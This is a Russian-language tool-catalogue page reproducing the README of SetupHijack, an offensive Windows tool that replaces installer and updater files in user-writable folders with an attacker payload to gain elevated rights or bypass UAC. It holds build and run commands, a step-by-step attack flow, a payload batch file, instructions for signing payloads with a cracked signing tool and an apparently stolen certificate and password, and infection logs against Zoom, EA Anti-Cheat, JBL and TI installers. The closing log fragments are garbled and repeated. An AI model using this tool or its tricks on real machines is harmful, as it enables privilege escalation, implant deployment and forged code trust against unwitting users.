Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
SetupHijack — SetupHijack is a security research tool that exploits race conditions and insecure file handling in Windows applications installer and update processes. | Kitploit
Инструменты/GitHubGitHub/hackerhouse-opensource/setuphijack
Privilege EscalationPayload GenerationExploitationLateral MovementPenetration TestingRed Teaming
GitHubhackerhouse-opensource/setuphijack

SetupHijack

SetupHijack is a security research tool that exploits race conditions and insecure file handling in Windows applications installer and update processes.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
264296 месяцев назадПроверено Kitploit

SetupHijack


Обзор

SetupHijack — это инструмент для исследования безопасности, который использует состояния гонки и небезопасную обработку файлов в процессах установки и обновления Windows. Он нацелен на сценарии, где привилегированные установщики или обновляющие программы помещают файлы в %TEMP% или другие общедоступные для записи расположения, что позволяет злоумышленнику заменить эти файлы до их выполнения с повышенными привилегиями.

  • Не требует повышенных разрешений для запуска.
  • Не использует уведомления файловой системы (вместо этого опрашивает изменения).
  • Использует слабые места в подписи кода Authenticode и моделях доверия установщиков.
  • Может заражать .exe, .msi и пакетные файлы (например, sysinfo, netstat, ipconfig).
  • Предназначен только для использования красными командами, тестирования на проникновение и исследований в области безопасности.

Предполагаемое использование этого инструмента — запуск в фоновом режиме на скомпрометированной учетной записи пользователя с привилегиями, чтобы повысить привилегии другого процесса путем перехвата сбрасываемых файлов установщиков/обновляющих программ.

На диаграмме ниже показаны примеры использования этой уязвимости в реальных сценариях, которые могут быть использованы для обхода UAC. Обход UAC считается границей безопасности при работе под Adminless и является распространённым "требованием злоумышленника" для отключения средств безопасности. Использование привилегированных операций администратора обеспечивает общий доступ для вредоносного кода к боковой загрузке или повышению привилегий процессов. Этот инструмент может использоваться для идентификации дополнительных приложений, подверженных таким же типам риска; злоумышленник может дождаться выполнения этих процессов как средства получения повышенных прав без нарушения поведения пользователей.

Диаграмма выявления уязвимостей SetupHijack

Как это работает

  1. SetupHijack непрерывно сканирует %TEMP% (и подкаталоги) на наличие новых или изменённых файлов установщиков.
  2. Когда целевой файл обнаружен, он заменяется на предоставленную пользователем полезную нагрузку (EXE, MSI или BAT), с возможностью сохранения оригинала в виде файла .bak.
  3. Если привилегированный процесс выполняет заменённый файл до проверок целостности, полезная нагрузка запускается с повышенными правами (например, SYSTEM или Администратор).
  4. Инструмент регистрирует все действия и ведёт список пропусков, чтобы избежать повторного заражения тех же файлов.

Примечание о подписи кода

В этом проекте используется взломанный процесс подписи кода с SignToolEx.exe и SignToolExHook.dll для подписи полезных нагрузок и установщиков. Использование действительных сертификатов подписи кода и метки времени Authenticode повысит ваш процент успеха при обходе проверок доверия установщика и ОС.


Использование

Сборка```sh

nmake PAYLOAD=c:\Path\to\your\payload.exe

root@kitploit:~
### Запуск (опции)```sh
SetupHijack.exe                  # Scan %TEMP%, %APPDATA%, and %USERPROFILE%\Downloads (default)
SetupHijack.exe -notemp          # Disable scanning %TEMP%
SetupHijack.exe -noappdata       # Disable scanning %APPDATA%
SetupHijack.exe -nodownloads     # Disable scanning %USERPROFILE%\Downloads
SetupHijack.exe clean            # Clean mode (restores .bak backups in all enabled locations)
SetupHijack.exe verbose          # Verbose mode (log all actions)
SetupHijack.exe <payload.exe>    # Use specified payload for .exe (unless argument is a recognized option)
  • Запустите SetupHijack.exe до или во время привилегированной установки/обновления.
  • По умолчанию инструмент сканирует все распространённые места для сброса: %TEMP%, %APPDATA% и %USERPROFILE%\Downloads.
  • Вы можете отключить любое местоположение с помощью флагов -notemp, -noappdata или -nodownloads.
  • Флаг clean восстанавливает резервные копии во всех включенных местоположениях. Флаг verbose регистрирует все действия.
  • Для удаленного повышения привилегий используйте вместе с shadow.exe или аналогичными инструментами в службах терминалов.

Пример потока атаки

  1. Соберите полезную нагрузку и SetupHijack: ```sh nmake PAYLOAD=c:\Users\YourUser\Desktop\payload.exe
    root@kitploit:~
  2. Запуск SetupHijack: ```sh SetupHijack.exe
    root@kitploit:~
  3. Запустите целевой установщик или процесс обновления от имени администратора.
  4. Если установщик помещает файлы в %TEMP% и запускает их с повышенными правами, ваша полезная нагрузка будет подставлена и выполнена.

Пример вывода

Ниже приведен реальный пример сборки и запуска SetupHijack, включая подпись кода и результат заражения:``` C:\Users\Fantastic\Desktop\Sayuri\InfectElevatedSetups>nmake PAYLOAD="C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe"

Microsoft (R) Program Maintenance Utility Version 14.29.30159.0 Copyright (C) Microsoft Corporation. All rights reserved.

root@kitploit:~
    powershell -Command "(Get-Content SetupHijack.cpp) -replace '#define PAYLOAD_PATH L\".*\"', '#define PAYLOAD_PATH L\"%ESCAPED_PAYLOAD%\"' | Set-Content SetupHijack.cpp"
    cl /nologo /W4 /EHsc /DUNICODE /D_UNICODE /MT /O2 /c SetupHijack.cpp

SetupHijack.cpp SetupHijack.cpp(318): warning C4189: 'hr2': local variable is initialized but not referenced taskkill /f /im SetupHijack.exe 2>nul powershell -Command "Start-Sleep -Milliseconds 500" link /nologo /SUBSYSTEM:CONSOLE /ENTRY:wmainCRTStartup /NODEFAULTLIB:MSVCRT /NODEFAULTLIB:MSVCPRT /OUT:SetupHijack.exe SetupHijack.obj kernel32.lib user32.lib shlwapi.lib Shell32.lib /MANIFEST /MANIFESTFILE:SetupHijack.exe.manifest copy /y install.wxs.template install.wxs 1 file(s) copied. powershell -Command "(Get-Content install.wxs) -replace 'Source="PAYLOAD_PLACEHOLDER"', 'Source="%ESCAPED_PAYLOAD%"' | Set-Content install.wxs" wix build install.wxs -o install.msi Generating install.bat with payload C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe Generating launch_payload.bat with payload C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe powershell -Command "(Get-Content install.wxs) -replace '(<File Id="RengeExeFile" Source=").*?(" KeyPath="yes"/>)', '%ESCAPED_PAYLOAD%' | Set-Content install.wxs" call sign_random.bat Using CERT: [certs\rockstar1.pfx] Using PASS: [C!EZxYUxVGPzQDj3] The following certificate was selected: Issued to: Rockstar Games, Inc. Issued by: Entrust Code Signing CA - OVCS1 Expires: Thu Mar 20 17:16:13 3000 SHA1 hash: C9793F4A2E629D88F2213622D7A0C170D9C7CBC6

Done Adding Additional Store Successfully signed: SetupHijack.exe

Number of files successfully Signed: 1 Number of warnings: 0 Number of errors: 0 The following certificate was selected: Issued to: Rockstar Games, Inc. Issued by: Entrust Code Signing CA - OVCS1 Expires: Thu Mar 20 17:16:13 3000 SHA1 hash: C9793F4A2E629D88F2213622D7A0C170D9C7CBC6

Done Adding Additional Store Successfully signed: install.msi

Number of files successfully Signed: 1 Number of warnings: 0 Number of errors: 0

C:\Users\Fantastic\Desktop\Sayuri\InfectElevatedSetups>SetupHijack.exe [2025-09-24 15:20:46] [SetupHijack] Using payload: C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe [2025-09-24 15:20:46] [SetupHijack] If infecting .msi, will use: install.msi [2025-09-24 15:20:46] [SetupHijack] Polling enabled locations recursively for .exe, .msi, .bat: [2025-09-24 15:20:46] - C:\Users\FANTAS1\AppData\Local\Temp [2025-09-24 15:20:46] - C:\Users\Fantastic\AppData\Roaming [2025-09-24 15:20:46] - C:\Users\Fantastic\Downloads [2025-09-24 15:20:46] [SetupHijack] Entering infection loop. [2025-09-24 15:20:59] [SetupHijack] Total infections this session: 0 [2025-09-24 15:21:13] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\installcmd.bat with payload install.bat, backup: C:\Users\FANTAS~1\AppData\Local\Temp\installcmd.bat.bak [2025-09-24 15:21:13] [SetupHijack] New infections this run: 1 [2025-09-24 15:21:22] [SetupHijack] Replaced C:\Users\Fantastic\Downloads\installcmd.msi with payload install.msi, backup: C:\Users\Fantastic\Downloads\installcmd.msi.bak [2025-09-24 15:21:26] [SetupHijack] New infections this run: 1 [2025-09-24 15:21:26] [SetupHijack] Total infections this session: 2 [2025-09-24 15:21:41] [SetupHijack] Replaced C:\Users\Fantastic\AppData\Roaming\InsecureApp\setup.exe with payload C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\Fantastic\AppData\Roaming\InsecureApp\setup.exe.bak [2025-09-24 15:21:41] [SetupHijack] New infections this run: 1 [2025-09-24 15:21:53] [SetupHijack] Total infections this session: 3

root@kitploit:~
## Пример использования для развертывания импланта

Ниже приведен скриншот, показывающий SetupHijack в действии: развертывание импланта во время привилегированного запуска установщика:

![Пример использования для развертывания импланта](https://assets.kitploit.com/production/public/readmes/42886/25e1c4b4b2ca8921509760ae8ddf420a66a13deaed03631c44de618dc668f218.png)

## Замечания по безопасности

- Этот инструмент предназначен только для авторизованного тестирования и исследований.
- Использование этих уязвимостей может привести к полной компрометации SYSTEM, если пользователь входит в группу Administrator.
- Установщики могут использовать проверки хэша/подписи, которые заблокируют эту атаку, но многие до сих пор этого не делают.
- Всегда используйте в контролируемой среде.
- Если вы обнаружите CVE или получите вознаграждение с помощью этого инструмента, укажите нас как авторов!

Нацеливание на одну директорию (например, `%TEMP%`) за раз может увеличить вероятность выигрыша в состоянии гонки «время создания/время использования» (TOCTOU), так как это позволяет быстрее опрашивать и уменьшает конкуренцию. Для максимальной надежности запустите несколько экземпляров SetupHijack, каждый из которых будет сосредоточен на одной директории. Для оптимальных результатов убедитесь, что ваш полезный нагрузка (EXE, который вы хотите запустить с повышенными правами) содержит манифест с запросом повышения (requireAdministrator) и подписан действительным сертификатом кода, содержащим метку времени Authenticode. Это увеличивает шанс обхода проверок доверия установщика и ОС на установщиках.

## Выявленные уязвимости

Следующий неисчерпывающий список был выявлен при «наилучших сценариях» запуска непроверенных .MSI, приводящих к «NT AUTHORITY\SYSTEM», но многие процессы с повышенными правами UAC часто запускаются через .bat-файлы. Поскольку выполнение происходит под одним и тем же SID пользователя, а `%TEMP%` уникален для SID пользователя, созданного в `%USERPROFILE%` как часть внутреннего создания сеанса, вы можете повысить права в рамках одной сессии до полных прав с высокой целостностью через манипуляцию .bat-файлом, который наследует права родительского процесса. «Выполнение команд с повышенными правами через временный файл» — это распространенный результат, который можно использовать для обхода UAC и выполнения без прав администратора при запросе пользователя на защищенном рабочем столе, показывающем эксплуатируемое приложение (например, обновление Zoom).

- Zoom 6.6.1 (15968) использует `%AppData%` для установки и обновления .exe, что позволяет перемещение процессов и спуфинг процессов (например, отправка запроса на повышение прав из обновления Zoom). Исполняемые файлы можно легко изменить для атак с целью кражи учетных данных и вредоносных целей.```
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\airhost.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\aomhost64.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\CptControl.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\CptHost.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\CptInstall.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\CptService.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\Installer.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zCrashReport.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zCrashReport64.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\Zoom.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomDocConverter.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomHybridConf.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomOutlookIMPlugin.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomOutlookMAPI\ZoomOutlookMAPI.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomOutlookMAPI\ZoomOutlookMAPI64.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\Zoom_launcher.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zTscoder.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zUpdater.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zWebview2Agent.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\uninstall\Installer.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\ZoomDownload\Installer.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
  • msiexec.exe при запуске install.msi выполняется от имени NT AUTHORITY\SYSTEM

  • Исполняемый файл обновления Wireshark передаётся через %Temp%, не удалось выиграть гонку.

  • Проверки цифровой подписи кода Visual Studio для обновлений предотвращают эксплуатацию, (легко протестировано .VSIX)

  • Установщик Texas Instrument Code Composer может быть использован для обхода аутентификации UAC 09/25/2025. (ccs_setup_20.3.0.00014.exe)``` [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\7z.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\7z.exe.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\7za.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\7za.exe.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\ccs_monitor.bat with payload install.bat, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\ccs_monitor.bat.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\ccs_update_20.3.0.00014.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\ccs_update_20.3.0.00014.exe.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\certificates\install-certs.bat with payload install.bat, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\certificates\install-certs.bat.bak [2025-09-25 14:39:59] [SetupHijack] New infections this run: 1 [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\curl.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\curl.exe.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\signing\sign.bat with payload install.bat, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\signing\sign.bat.bak [2025-09-25 14:39:59] [SetupHijack] New infections this run: 1 [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\wget\wget.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\wget\wget.exe.bak [2025-09-25 14:39:59] [SetupHijack] New infections this run: 1 [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\zip\unzip.exe.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\zip\zip.exe.bak [2025-09-25 14:39:59] [SetupHijack] New infections this run: 2 [2025-09-25 14:39:59] [SetupHijack] New infections this run: 5 [2025-09-25 14:40:02] [SetupHijack] Total infections this session: 13 [2025-09-25 14:40:29] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\tmp1758829228.bat.bak [2025-09-25 14:40:29] [SetupHijack] New infections this run: 1

root@kitploit:~
- Cursor IDE был замечен создающим .bat файлы и историю команд в %TEMP%, что может быть использовано для внедрения
  команд в историю Cursor, с ограниченным повышением привилегий.

- JBL Quantum Engine содержит (теперь исправленную) уязвимость внедрения команд, которая запускает "net" (включая .bat) из
  того же каталога, откуда выполняется JBL_QuantumENGINE_1.11.0.1511_x64. Последняя версия использует новый установщик,
  который не уязвим к этой конкретной уязвимости внедрения команд (JBL_QuantumENGINE_Installer_2.2.13_x64.exe). Эта
  проблема была обнаружена как 0day в ноябре 2022 года. Она может быть использована для обхода ограничений UAC и получения
  повышенных прав Администратора. Системная служба записывает bat файлы в %TEMP% для отладки/диагностики. ;-)```
C:\Users\Fantastic\Desktop\Sayuri\JBL_and_WinAudioCore_0day>type net.bat
@echo off
REM install.bat - runs the payload for SetupHijack
start "" "c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe"

C:\Users\Fantastic\Desktop\Sayuri\JBL_and_WinAudioCore_0day>dir JBL_QuantumENGINE_1.11.0.1511_x64.exe
 Volume in drive C has no label.
 Volume Serial Number is 48EC-B703

 Directory of C:\Users\Fantastic\Desktop\Sayuri\JBL_and_WinAudioCore_0day

11/20/2022  11:54 AM       139,327,096 JBL_QuantumENGINE_1.11.0.1511_x64.exe
               1 File(s)    139,327,096 bytes
               0 Dir(s)  237,500,821,504 bytes free
  • EA Sports "Установщик EA Anti-Cheat" — произвольное выполнение команд с повышенными привилегиями. Игры EA, такие как "skate.", устанавливают античит-сервис, который использует временное и доступное для записи пользователем местоположение. Злоумышленник может заменить EAAntiCheat.Installer.exe во время установки через STEAM, и запрос на повышение привилегий UAC будет исходить от движка STEAM, с логотипом и иконкой Valve, но при этом будет выполнять ваш payload.exe с повышенными правами. См. скриншоты EASkateUAC для использования в атаках обхода (путаницы?) UAC.``` Directory of C:\Program Files (x86)\Steam\steamapps\common\Skate__Installer\EAAntiCheat

09/29/2025 04:34 PM

. 09/29/2025 04:13 PM .. 09/29/2025 04:31 PM 166,999,232 EAAntiCheat.Installer.exe 1 File(s) 166,999,232 bytes 2 Dir(s) 161,991,856,128 bytes free

C:\Program Files (x86)\Steam\steamapps\common\Skate__Installer\EAAntiCheat>cacls EAAntiCheat.Installer.exe C:\Program Files (x86)\Steam\steamapps\common\Skate__Installer\EAAntiCheat\EAAntiCheat.Installer.exe BUILTIN\Users:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Administrators:(ID)F WIN11LAB\Fantastic:(ID)F APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R

C:\Program Files (x86)\Steam\steamapps\common\Skate__Installer\EAAntiCheat>copy c:\Users\Fantastic\Documents\Work\EA\launch_demo.exe EAAntiCheat.Installer.exe Overwrite EAAntiCheat.Installer.exe? (Yes/No/All): A 1 file(s) copied.

root@kitploit:~
# Лицензия

Эти файлы доступны по лицензии BSD с тремя пунктами.
Скачать инструмент
1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\zip\unzip.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS
1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\zip\zip.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS
1\AppData\Local\Temp\tmp1758829228.bat with payload install.bat, backup: C:\Users\FANTAS